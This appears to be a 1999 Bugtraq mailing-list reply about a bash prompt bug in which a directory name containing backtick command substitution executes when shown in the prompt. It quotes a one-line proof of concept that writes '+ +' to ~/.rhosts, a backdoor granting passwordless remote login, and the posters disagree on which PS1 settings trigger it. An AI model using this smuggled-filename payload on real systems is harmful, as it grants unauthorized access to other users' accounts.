Re: Bash Bug

[philip.rueegsegger () BRUKER CH (Ph. Rueegsegger)]

Date sent:              Thu, 22 Apr 1999 01:39:48 +0100
Send reply to:          Andy Church <achurch () DRAGONFIRE NET>
From:                   Andy Church <achurch () DRAGONFIRE NET>
Subject:                Re: Bash Bug
Originally to:          shadow () OPERATOR ORG
To:                     BUGTRAQ () netspace org

Hello together

> > Figured while everyone was working with bash, I might as well
make this
> > one public(I apologize if this is old news, apparently it hasnt been fixed
> > if so).
> >
> > If a user creates a directory with a command like
> >
> > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "

Not bad !

> > and someone cd's into said directory, either by accident, or whatever,
> > then it will cause it to actually execute.
>
>      Just to clarify, this only happens if PS1 (the bash prompt) contains
> \w or \W _and_ a prompt is displayed containing the bogus directory name.
> This means unattended shell scripts are safe.  As a workaround, use `pwd`
> in place of \w.

Sorry, with bash version 2.01.1 (supplied with SuSE5.3) is just the
opposite of what you are clarifying. If one has \w or \W specified in
PS1 to show the path, it does NOT happen and if `pwd` is specified
instead of \w or \W it DOES happen.

>      Tested with bash 1.14 (it's the only one I have handy).
>
>   --Andy Church
>     achurch () dragonfire net
>     http://achurch.dragonfire.net/

Kind regards
Phibus
-----------------------------------------------------------
                     Philip Rueegsegger
                      System Manager

Bruker AG                Direct dial   : +41-1-825 93 46
Industriestrasse 26      Telephone     : +41-1-825 91 11
CH-8117 Faellanden       Telefax       : +41-1-825 94 69
Switzerland              E-Mail        : philip.rueegsegger () bruker ch
-----------------------------------------------------------